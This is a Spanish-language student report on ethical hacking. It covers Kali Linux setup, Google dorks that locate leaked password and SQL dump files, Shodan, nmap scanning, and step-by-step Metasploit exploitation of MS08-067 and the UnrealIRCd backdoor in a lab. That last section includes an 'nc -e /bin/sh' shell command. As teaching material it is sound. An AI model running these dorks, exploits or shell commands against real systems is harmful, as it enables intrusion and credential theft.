Está en la página 1de 53

TECNOLGICO NACIONAL DE MXICO

Instituto Tecnolgico de La Piedad

INSTITUTO TECNOLOGICO DE LA PIEDAD

INGENIERA EN TECNOLOGAS DE LA INFORMACIN Y


COMUNICACIONES

TALLER DE INVESTIGACION II
Trabajo:
REPORTE TECNICO
Presentado por:
Laura Nayely Herrera Navarrete
Gmez Ayala Andrea Elizabeth

9 H Y 9 C

LA PIEDAD, MICHOACN

01 De Diciembre Del 2016

Av. Tecnolgico # 2000, Meseta de los Laureles, C.P. 59300,


Apartado Postal 22
La Piedad, Mich. Tels. 01 (352) 52 62294, 52 62369, 52 60680,
www.itlapiedad.coM

INDICE
INTRODUCCIN................................................................................................ 3
METODOLOGIA.................................................................................................. 4
INSTALACION DE KALI LINUX............................................................................4
ARMITAGE...................................................................................................... 11
RECOPILACIN DE INFORMACIN....................................................................12
SHODAN......................................................................................................... 19
Network Footprinting........................................................................................... 20
Plugins............................................................................................................. 23
ESCANEO Y FINGERPRINTING..........................................................................25
DESARROLLO DE LA METODOLOGIA............................................................31
EXPLOTAR MS08_067 CON MSF.........................................................................31

INTRODUCCIN
La seguridad de la informacin es aquella disciplina que consiste en un conjunto de
medidas preventivas, de deteccin y de correccin, con el objeto de proteger la integridad,
confidencialidad y disponibilidad de los recursos informticos por lo que estas tres
caractersticas mencionadas conforman los tres pilares de la seguridad informtica tambin
conocidos como la trada CIA (confidentiality, Integrity, Availability). [2]
Actualmente la tecnologa ha avanzado de manera significativa siendo la informacin lo
ms importante de una organizacin por lo que es de vital importancia su proteccin. Es
relevante mencionar que nuestro equipo siempre estar expuesto a sufrir incidentes de
seguridad eso no lo podemos evitar pero si podemos reducir el riesgo de que esto pase
adquiriendo los conocimientos
Los conceptos que son importantes que el usuario conozca dentro del mbito de la
seguridad informtica son la confidencialidad, integridad y disponibilidad. La
confidencialidad se refiere a la caracterstica que asegura que los usuarios no tengan acceso
a los datos a menos que estn autorizados para ello. Por otro lado la integridad nos indica
que toda modificacin de la informacin slo es realizada por usuarios autorizados, por
medio de procesos autorizados. Y la disponibilidad garantiza que los recursos del sistema y
la informacin estn disponibles slo para usuarios autorizados en el momento que los
necesiten. Otros conceptos asociados a la trada de la seguridad son la identificacin que es
un mecanismo por el cual los usuarios comunican su identidad al sistema, autenticacin que
se define como el proceso que comprueba que la informacin de identificacin corresponda
al sujeto que la presenta y la autorizacin que corresponde a los derechos y permisos
otorgados a un usuario que le permiten acceder a un recurso. Tambin intervienen
conceptos como trazabilidad (accountability) que se refiere a la habilitad para determinar
las acciones individuales de un usuario dentro de un sistema, privacidad, que determina el
nivel de confidencialidad que se brinda a un usuario dentro de un sistema y no repudio que
consiste en la utilizacin de elementos de informacin nica para validar la accin de un
usuario. Por ende el objetivo de la seguridad informtica es fortalecer una o varias de las
caractersticas de seguridad mencionadas, mitigando de esta forma los efectos producidos
por las amenazas y vulnerabilidades mediante el uso de controles preventivos, disuasivos,
detectivos, correctivos y recuperativos. Los preventivos y disuasivos toman accin en

momentos anteriores al incidente, con el objetivo de evitarlo. Los detectivos buscan


detectar el incidente en el momento en que ste est ocurriendo. Y los recuperativos y
correctivos tienen lugar una vez que el incidente ocurri. Para analizar la efectividad de
esos controles se realizan distintos anlisis de seguridad como los son vulnerability
assessment y ethical hacking. A continuacin describiremos de que se tratan haciendo
nfasis en el ethical hacking. Un Vulnerability Assessment es un anlisis de puntos dbiles
o vulnerabilidades de carcter tcnico que suele realizarse de manera remota: el tester
prueba la seguridad de los sistemas a travs de Internet.
METODOLOGIA
INSTALACION DE KALI LINUX

Requisitos previos de instalacin


1.
2.
3.

Un mnimo de 8 GB de espacio en disco para la instalacin de Kali Linux.


Para las arquitecturas 386 y amd64, un mnimo de 512 MB de RAM.
Lectora de CD/DVD / Soporte para iniciar desde una memoria USB.
1. Abrimos el archivo.

Ingresamos al siguiente vnculo: Descargar Kali Linux.


2. Compara la arquitectura del ordenador y descargar la adecuada, para este caso se
descargar: Kali Linux 64 bit ISO Torrent. Clic sobre el vnculo ISO. En unos
minutos se descarga el Sistema Operativo, mientras, recomiendo abrir VirtualBox
dando clic en la carpeta Aplicaciones y clic en VirtualBox.

Clic en el icono nue


Se escribe el Nombre de la Mquina Virtual y se selecciona el Tipo de Sistema
Operativo con su Versin y arquitectura.

Se define el Tamao de memoria. El valor recomendado 512 MB de RAM. Clic


en Siguiente.

Se define la Unidad de disco duro dando clic en el text box Crear un disco duro
virtual ahora y clic en el botn Crear.

Crear un disco duro virtual ahora

Se define el Tipo de archivo de unidad de disco duro, clic en la opcin VDI y clic
en el botn Siguiente.

Tipo de archivo de unidad de disco duro


En Almacenamiento en unidad de disco duro fsico seleccionar Reservado
dinmicamente y clic en Siguiente.

Almacenamiento en unidad de disco duro fsico


Ubicacin del archivo y tamao, seleccionamos 8 GB y clic en Crear.

Ubicacin del archivo y tamao

Abre la Ventana de Administracin de Virtual Box y muestra la unidad virtual


creada llamada Kali-Linux.

Ventana administracin de virtaulBox


Clic en el icono Configuracin localizado al lado superior izquierdo de la ventana
del administrador.

Clic en el icono configuracin


Seleccionar el icono Almacenamiento.

Seleccionar el icono almacenamiento

Seleccionar dentro del Arbol de Alamcenamoento la opcin Vaco.

Seleccionar Arde Almacenamiento


Clic en el disco ubicado al lado derecho de Unidad de CD/DVD y clic en
Seleccionar un archivo de disco virtual CD/DVD.

Seleccionar un archivo de disco virtual CD/DVD


Para continuar es fundamental localizar en descarga el archivo del Sistema
Operativo descargado.

Seleccionar un archivo de disco virtual CD:DVD


La opcin dentro del rbol de Almacenamiento que deca Vaco, ahora asume el
nombre del Sistema Operativo en este caso Kali-linux-1.1.0a-amd64.iso. El
siguiente paso es dar clic en Aceptar.

Sistema Operativo en este caso Kali-linux-1.1.0a-amd64.iso


Se muestra la ventana principal de Administracin de VirtualBox

Ventana principal
Ya puedes ingresar a Kali Linux, dando doble clic en la mquina virtual de KaliLinux veras como abre.

Das un clic en Live (amd64) e inicia el Sistema Operativo.

inicia el Sistema Operativo.


El Sistema Operativo abre correctamente.

ARMITAGE
Armitage es un fantstico front-end GUI para el Metasploit Framework desarrollado por
Raphael Mudge con el objetivo de ayudar a los profesionales de la seguridad a entender
mejor el hackeo y ayudarles a darse cuenta del poder de Metasploit. Para ms informacin
acerca de este excelente proyecto se puede obtener en la web oficial de Armitage .

RECOPILACIN DE INFORMACIN.

Esta fase es necesaria por una razn bsica: le da una imagen de lo que el hacker ve. Y si
sabe qu ve el hacker, conoce los posibles riesgos de seguridad que tiene su entorno. Y
cuando sabe qu riesgos tiene, sabe cmo evitar que se exploten. Podemos recopilar
informacin mediante diferentes tipos de tecnologas como internet, intranet, acceso remoto
y extranet. [4]

Recopilacin de Informacin de Internet.


Los buscadores son una herramienta importante en esta fase por ejemplo Google Hacking

En donde los principales comandos de bsqueda avanzada google son:


(comillas): buscar frase exacta.
And or not: operadores lgicos y o no
+ y - : incluir y excluir. Ejemplo: jaguar coches: busca la palabra jaguar, pero
omite las webs con la palabra coches
Asterisco * : comodn, cualquier palabra, pero una sola palabra.
.(punto): comodn, cualquier palabra, una o muchas.
Site: busca todo lo relacionado al dominio.
Allintitle: sitios de ttulos con todas las palabras definidas.
Link: slo busca en pginas que tienen un link a una determinada web.
Inurl: presente en el URL.
Filetype: tipo de archivo por buscar, extensin.
Allintext: todo presente en el texto por buscar.
Inanchor: busca en el texto utilizado como link.
Daterange: busca entre rangos de fechas.
Cache: muestra el resultado en la cache de google de una pgina web.
Related: busca webs relacionadas con una determinada.
Group: busca pertenencia de grupo en google groups.
Phonebook: busca nmeros de telfono.
Define: busca el significado de determinado vocablo.[1]
Combinando estos operadores, el hacker puede obtener varios tipos de informacin.
1) Ficheros con usuarios y contraseas: lo que permite al hacker entrar directamente en
tu web. Ejemplos:
Ext:pwd inurl: (service|authors|administrators|users) -FrontPage- Usuarios y
claves de administradores, para modificar la web se ven directamente en google, sin
necesidad de entrar en la pgina. Hay ms de 1,100 claves as en google.

2) Bases de datos sql volcadas completas, tienen datos de usuarios y contraseas. Por
ejemplo si escribimos en el navegador lo siguiente:
filetype:sql # dumping data for table `PASSWORD` varchar

Si seleccionamos un resultado de la bsqueda podemos ver la base de datos con sus


usuarios y contraseas como se muestra a continuacin:

3) Servidores con un archivo llamado password.txt. Se puede centrar por pases con
site:.mx o por pginas educativas con site:.edu

Si damos clic en el primer resultado de nuestra bsqueda nos aparece lo siguiente:

Ahora veremos un archivo txt con las contraseas de una base de datos.

4) Google nos da ms de 2,000 usuarios y contraseas de bases de datos MySQL:


filetype:inc intext:mysql_connect password -please -could port

Si ingresamos en la primera opcin mostrada nos aparecer lo siguiente:

Obtener Informacin Del Tipo Contenido Histrico De Sitios.


Podemos visitar el sitio www.archive.org. ste nos muestra, en una lnea temporal, las
diferentes pginas web que tuvo una actual. Por ejemplo: Google

SHODAN
www.shodanhq.com es un motor de bsqueda diferente de los conocimos. A partir del uso
de determinados filtros, permite identificar dispositivos, servidores y aplicaciones
especficas conectadas a Internet.
A diferencia de los motores de bsqueda tradicionales, SHODAN indexa la informacin
segn los metadatos presentes en los dispositivos, servidores y aplicaciones. Ejemplos de
estos metadatos son los banners de diferentes servicios, los mensajes de bienvenida, la
informacin que se intercambia en una conexin, etc.

Network Footprinting
Las fuentes ms comunes para relevar la informacin relacionada con direcciones IP y
datos tcnicos incluye el uso de herramientas propias, ofrecidas por el sistema operativo,
por ejemplo, whois, traceroute, dig y tambin nslookup.
Una de las tcnicas ms utilizadas es la enumeracin DNS (Domain Name System), la cual
tiene por objetivo ubicar todos los servidores DNS y sus registros dentro de una
organizacin.

Whois y enumeracin DNS

Tambin podemos encontrar rangos IP y nmeros de sistema autnomos BGP que


pertenecen a una organizacin al buscar los servicios WHOIS de RIR para el nombre literal
de la organizacin. Por ejemplo, si buscamos Google en http://www.arin.net, vemos que
el rango IP pertenece a Google bajo su nombre.

Firefox como herramienta de recopilacin de informacin


Plugins
El primero de ellos es PassiveRecon. Cuando visitamos un sitio web desde
Firefox, este plugin nos permite relevar informacin de red e, incluso,
archivos y correos electrnicos publicados. Para hacerlo, cada vez que
cliqueamos en una de sus opciones, en una nueva pestaa del navegador se
enlaza a alguno de los tantos recursos disponibles en internet para buscar
informacin. Por ejemplo, en el caso de servidores DNS, permite realizar
consultas tanto a Robtex como a intoDNS.

PassiveRecon permite centralizar el relevamiento de informacin enlazando a


distintos sitios.
Otro plugin que permite relevar gran cantidad de informacin de la red
objetivo es WorldIP. Este incorpora numerosas funciones, como whois,
traceroute y ping, entre otras, y muestra los resultados de manera intuitiva.

WorldIP puede descargase ingresando en el enlace que se presenta a


continuacin:
https://addons.mozilla.org/en-US/firefox/addon/worldip-flagand-datacenter-pi/.

Finalmente, la tercera extensin a la que haremos referencia est orientada a la


bsqueda de perfiles en las distintas redes sociales. Si bien no es una extensin
desarrollada con fines de seguridad, el hecho de que permita buscar un perfil
en mltiples redes sociales hace que sea sumamente aprovechada en la etapa
de recopilacin de informacin. Su nombre es Social Friend Finder (SFF) y
permite buscar a una persona en varias redes sociales en simultneo,
incluyendo Facebook, Twitter y Google Profiles.
Es posible descargar la versin Community Edition de Maltego desde el
enlace http://www.paterva.com/web5/client/download.php. Cabe recordar que
hay que registrarse en el sitio, porque la primera vez que iniciemos la
herramienta, tendremos que ingresar nuestras credenciales para utilizarlo. Para
conocer en detalle la herramienta, podemos dirigirnos al manual de usuario
oficial,
presente
en
el
siguiente
enlace:
http://ctas.paterva.com/view/Userguide.

ESCANEO Y FINGERPRINTING
Con estos mtodos se buscar conocer:

Si los hosts (PC y server) de una red o determinado rango de Internet estn
funcionando a travs de un network scanning. [1]
A travs de un port Scanning: qu puertos estn abiertos, filtrados o cerrados.
Con el fingerprinting: qu sistema operativo, versin de aplicacin o kernel posee el
servidor vivo.
Con el vulnerability scanning podr conocer descuidos de admiracin o
vulnerabilidades previamente conocidas.[1]

Determinar si el sistema est vivo.

Ping suele usarse para enviar paquetes ICMP ECHO a un sistema de destino en un intento
por producir un ICMP ECHO_REPLY que indica que el sistema de destino est vivo. Por
ejemplo vamos a hacer un ping a la direccin de la mquina objetivo: [4]

Una de las tcnicas fiables para realizar barridos de ping en el mundo UNIX es usar fping
que es una utilera que enviar solicitudes paralelas de manera masiva, de acuerdo con un
sistema round-robin tradicional. Por lo tanto, fping barrer muchas direcciones IP de
manera significativamente ms rpida que ping, fping puede usarse en una de dos formas:
alimentarlo con una serie de direcciones IP desde una entrada estndar (stdin) o hacer que
las lea de un archivo. Esta segunda forma de fping es fcil de usar; simplemente cree su
archivo con direcciones IP en cada lnea.

Despus use el parmetro f para leer en el archivo:

La opcin a de fping mostrar slo los sistemas que estn vivos. Tambin puede
combinarla con la opcin d para resolver nombres de host, si as lo desea. Escriba fping h
para conocer una lista completa de opciones disponibles. Otra utileras que se destaca en
este libro es nmap de Fyodor. [4] Ejemplos de escaneos en nmap:

Listado de puertos: nmap sS IP


Barrida de rango: nmap sS 200.**.0.2-200 (escaneo ese rango de 2 a 200).

Barrida de rango buscando los puertos SSH, Netbios, FTP y Telnet: nmap sS p
22,21,139, 23 200.**.0.2-200
Obtener sistema operativo: nmap O v IP
Versiones de servicios: nmap T Aggressive sV n O v IP

Determinacin de los servicios que se estn ejecutando o escuchando.


-

Identificacin de servicios TCP y UDP en ejecucin.


Strobe es una utilera de escaneo de puerto TCP escrita por Jualian Assange
(http://linux.maruhn.com/sec/strobe.html). Hace ya tiempo que existe y es uno
de los escneres TPC ms confiables. Algunas de las caractersticas clave de
strobe incluyen la capacidad de optimizar recursos de sistema y red y de
escanear el sistema de destino en forma eficiente.
Las listas de salida de strobe muestran cada puerto TCP en estado de escucha:

Network Mapper (nmap): proporciona capacidades de escaneo TCP y UDP


bsicas, adems de la incorporacin de tcnicas de escaneo ya mencionadas.
Una de las caractersticas ms tiles; de ellas la ms simple es el escaneo de
puerto SYN de TCP:

La opcin O, para guardar la salida a un archivo separado. Si se usa la opcin oN, se


guardarn los resultados en formato legible para seres humanos:

Enumeracin y Deteccin de sistema operativo.


El objetivo de esta fase es obtener informacin relativa a los usuarios, nombres de equipos,
recursos y servicios de red.

Al utilizar la opcin de toma de huellas digitales de pila de nmap, es fcil


determinar con precisin el sistema operativo de destino. La precisin de la
determinacin depende ampliamente de, por lo menos, un puerto abierto en el de
destion. Pero aunque no hay puetos abiertos en el sistema de destino, nmap an
puede hacer una suposicin estudiada acerca de sus sistema operativo.

DESARROLLO DE LA METODOLOGIA
EXPLOTAR MS08_067 CON MSF

La explotacin de esta vulnerabilidad es un clsico en lo referente a


realizar demostraciones o prcticas sobre la diversidad de funcionalidades
que proporciona Metasploit Framework.
El boletn de seguridad de Microsoft MS08067 est categorizado como
crtico, e implica una vulnerabilidad en el servicio Server que permita a un
atacante remoto la ejecucin de cdigo. Esta vulnerabilidad permitira a un
atacante remoto la ejecucin de cdigo en un sistema afectado que reciba
una solicitud RPC (Remote Procedure Call) especialmente manipulada. Es
posible que esta vulnerabilidad sea utilizada en la creacin de un exploit en
forma de un gusano (worm). Las configuraciones por defecto de los
firewalls estndar y las mejores prcticas pueden ayudar a proteger los
recursos de red desde ataques originndose fuera del permetro de la
organizacin.
De la informacin proporcionada por el mdulo de explotacin
Windows/smb/ms08_067_netapi se indica que este mdulo explota una
falla en la interpretacin de la ruta del cdigo de canonizacin de
NetAPI32.dll a travs del servicio Server. Este mdulo es capaz de evadir
NX sobre algunos sistemas operativos o paquetes de servicio.
NX (No execute) es una funcionalidad construida dentro de algunos CPUs
para prevenir la ejecucin de cdigo en ciertas reas de memoria. En
Windows, NX es implementado como prevencin de ejecucin de datos
(DEP).
(ReYDeS, Explotar MS08-067 Con MSF, www.reydes.com, 2016)
Vamos a mostrar la explotacin de la vulnerabilidad MS08-067 en
Windows XP del mdulo netapi utilizando en el protocolo SMB de equipos
Windows que permite la ejecucin de cdigo arbitrario utilizando
Metasploit.
En la siguiente imagen mostramos la direccin ip de la mquina que
atacaremos.

Y la direccin de la mquina con la que atacaremos:

En primera instancia abrimos la consola de Metasploit con el comando:


#msfconsole

Se busca el mdulo, se define su utilizacin y luego se listan sus opciones.


Search ms08_067_netapi
Use exploit/windows/smb/ms08_067_netapi

Show options

La primera opcin RHOST debe contener el nombre direccin IP de la


mquina XP que queremos atacar. RPORT y SMBPIPE son opciones
obligatorias que indican el puerto por el que se mandar el exploit y el tipo
de conexin a utilizar. No es necesario modificar estos ltimos dos valores.
Para configurar la IP de la mquina XP que vamos a atacar, ejecutamos el
siguiente comando:
Set RHOST 192.168.1.X

Donde 192.168.1.x corresponde a la IP de la vctima


La seccin Exploit target indica a qu plataformas se mandar este exploit.
Si ejecutamos el siguiente comando podemos ver todas las plataformas que
son vulnerables con este exploit:
Show targets

Observamos que la opcin actual 0 indica una identificacin automtica de


la plataforma, esta opcin es suficiente y no es necesario modificarla.
Por ltimo debemos configurar el payload de nuestro exploit, esto no es ms
que indicarle a Metasploit que una vez que la vulnerabilidad sea explotada en
el equipo vctima, debe ejecutar cierta aplicacin para que podamos tomar
control remoto de la mquina. Esta configuracin la agregamos con la
siguiente opcin:
Set payload Windows/meterpreter/reverse_tcp

El payload reverse_tcp ejecuta un cliente reverse en la mquina XP, dicho


cliente se conectar hacia nuestro Metasploit por el puerto por defecto 4444.
Este payload es el que finalmente nos permitir tomar control del equipo
vctima. Ahora para indicarle a este cliente que se conecte a nuestro
Metasploit, debemos ejecutar el siguiente comando:

Set LHOST 192.168.1.65

Donde 192.168.1.65 corresponde a la IP de la mquina donde estamos


ejecutando el Metasploit.
Con esta configuracin estamos listos para iniciar el ataque a la vctima XP. Si
ejecutamos una ltima vez el comando show options veremos cmo qued la
configuracin de nuestro exploit:

Ahora estamos listos para enviar el ataque, para esto slo ejecutamos el
comando exploit y esperamos a que se concrete la operacin:

El ltimo prompt meterpreter> nos indica que estamos listos para controlar la
mquina XP, para comprobar que ya nos encontramos dentro de la mquina
XP, ejecutamos el comando sysinfo:

Ahora bien, podemos ejecutar el comando Shell para tener un promt dentro
del equipo vctima y comenzar a ejecutar operaciones:

Ahora ya estamos controlando la mquina vctima XP.


(RedinSkala, Tomar control remoto de una mquina Windows XP/2003 con
Metasploit, www.redinskala.com, 2016)
Podemos hacer este mismo procedimiento utilizando la herramienta Armitage:
Armitage es un administrador grfico de ciber ataques para Metasploit que
sirve para visuaizar grficamente tus objetivos. El mismo programa te

recomienda qu exploit debes usar. Expone las opciones avanzadas del


framework, desde el mismo Armitage podemos iniciar un anlisis con Nmap,
e incluso se puede usar el mdulo de Brute Force para sacar
username/password.
Ahora para ingresar a Armitage escribimos en una terminal Armitage o si
estamos en la distribucin de kali Linux damos clic en el icono que la
representa.
Nos aparecer lo siguiente y damos clic en connect para lanzar Metasploit
y conectar con el
.

En la siguiente ventana damos clic en Yes.

Podemos lanzar un escaneo con Nmap desde Armitage y automticamente nos


importar los resultados. En Hosts-> NmapScan-> Quick Scan (OS detect)

Ahora daremos clic en ok.

Entonces se muestran los host encontrados con el escaneo.

En seguida seleccionaremos el host que ser nuestra vctima y


seleccionaremos la pestaa Attacks-> find Attacks, esto no mostrar los

exploits que queremos ejecutar.

Un computador en rojo con ese tipo de nube alrededor, indica un host


comprometido. Puedes hacer click derecho para usar cualquier sesin
obtenida.

Ahora estamos dentro del sistema y podemos obtener una captura de pantalla:
Meterpreter1->Explore->Screenshot

Tambin podemos ver los archivos de la mquina vctima, para eso nos vamos
a

Meterpreter1->Explore->Browse files

Tambin podemos ingresar a la consola de comandos de Windows XP:


Clic derecho-> Meterpreter1->Interact-> Command Shell.

El tercer tipo son lo exploits Client Side.


Buscan aprovecharse de vulnerabilidades que tpicamente se encuentran en
aplicaciones cliente, las cueles estn instaladas en gran parte de las
estaciones de trabajo de las organizaciones, pero que no estn expuestas a
Internet. Ejemplos de ellas son las aplicaciones de ofimtica, como
Microsoft Office u Open Office, lectores de PDF como Adobe Acrobat
Reader, navegadores de Internet como Firefox, Internet Explorer, Chrome
o Safari, e incluso, reproductores multimedia como Windows Media
Player, Winamp o iTunes.
SHELLCODES
Un shellcode es una serie de comandos escrita generalmente en lenguaje
ensamblador, que se inyecta en una porcin de la memoria de un proceso
en ejecucin para conseguir que este reaccione y entregue al atacante una
consola de operacin, por ejemplo, el cmd.exe de los sistemas Windows o
un /bin/bash de los sistemas Linx. Una vez descompilados, obtenemos un
cdigo de mquina escrito en notacin hexadecimal, que luego
utilizaremos en programas escritos en lenguaje de alto nivel. En estos
casos, el exploit ser un archivo especialmente armado por el atacante con

un formato soportado por alguna de estas aplicaciones, como un


documento PDF. Adems, el vector de ataque estar segmentado en varias
partes, ya que al no estar expuesto a Internet el exploit (en este caso, el
documento PDF) deber llegarle al objetivo por algn medio alternativo,
por ejemplo, un correo electrnico. Luego, dicho archivo deber ser
ejecutado por el usuario y, recin en esta instancia, si el ataque no es
detenido por ningn control de parte de la vctima (un firewall o un
antivirus), se podr tener acceso al equipo objetivo.
Explotacin manual
Originalmente, la nica manera de explotar una vulnerabilidad era
mediante la creacin de un cdigo que se encargara de hacerlo. Para esto,
un hacker deba conocer sobre todos los temas asociados, como protocolos,
arquitectura del sistema objetivo, programacin en lenguajes de bajo nivel
y de scripting, y mucho ms. La explotacin manual era en ese entonces un
proceso duro, especfico y muy costoso en tiempo y esfuerzo, reservado
solo a unos pocos expertos.
Puertas Traseras (BackDoors)
Una vez que se logra el acceso de administrador y que se extraen
contraseas, los intrusos tratarn de consolidad su control de un sistema a
travs de varios servicios que habilitan el control remoto. A estos servicios
suele llamrseles puertas traseras. [4]
Explotar Puerta Trasera De UnrealIRCd En Metasploitable 2
UnrealIRCd es un servidor IRC Open Source, sirviendo miles de redes
desde 1999. En el mes de noviembre del ao 2009 el archivo de nombre
Unreal3.2.8.1.tar.gz fue reemplazado por una versin conteniendo una
puerta trasera (troyano). Esta puerta trasera permita a cualquier persona
ejecutar diversos comandos con los privilegios del usuario ejecutando ircd.
La puerta trasera era ejecutada sin importar las restricciones del usuario.
Se procede a realizar un escaneo de puertos TCP contra objetivo de
evaluacin utilizando la herramienta Nmap. Finalizado el escaneo, se
centra la atencin en el servicio IRC del puerto TCP 6667.

#nmap n Pn p- 192.168.0.X

Para obtener ms informacin sobre este servicio, se procede a realizar un


escaneo de versiones nicamente contra el puerto TCP 6667, utilizando la
herramienta Nmap.
# nmap -n -Pn -sV -p 6667 192.168.0.X

El resultado expone un "Unreal ircd". Con esta informacin se utiliza el


Script NSE de nombre irc-unrealircd-backdoor.nse incluido en Nmap, el
cual permite verificar si este servidor IRC contiene la puerta trasera.
# nmap -n -Pn -p 6667 --script=irc-unrealircd-backdoor.nse 192.168.0.X

El argumento de nombre "irc-unrealircd-backdoor.command" del script,


puede ser utilizado para ejecutar comandos arbitrarios en el sistema
remoto. Debido a la naturaleza de esta vulnerabilidad (El resultado nunca
es devuelto) no se tiene manera de obtener la salida del comando.
# nmap -n -Pn -p 6667 --script=irc-unrealircd-backdoor.nse --scriptargs=irc-unrealircd-backdoor.command='nc -l -p 7777 -e /bin/sh'
192.168.0.X

Desde otra terminal se utiliza la herramienta netcat para establecer una


conexin hacia el puerto TCP 7777.
# nc -n -vv 192.168.0.X 7777

La conexin se ha establecido correctamente. Y ya se tiene acceso en el


objetivo de evaluacin con los privilegios del usuario root.
Metasploit Framework incluye un mdulo de nombre UnrealIRCD 3.2.8.1
Backdoor Command Execution, el cual permite explotar la puerta trasera
maliciosa aadida a este servidor IRC.
Se inicia la consola de Metasploit Framework y se busca el mdulo del
exploit correspondiente.
msf > search unrealirc

Se le indica a Metasploit Framework la uilizacin de este exploit, para


luego proceder a definir las opciones requeridas. En este escenario solo se
requiere definir la direccin IP del objetivo del evaluacin.
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf > show options
msf > set RHOST 192.168.0.16

Se ejecuta el exploit satisfactoriamente. Luego de lo cual se obtiene una


shell con los privilegios del usuario root, lo cual permite interactuar y tener
control total del objetivo de evaluacin.
msf > exploit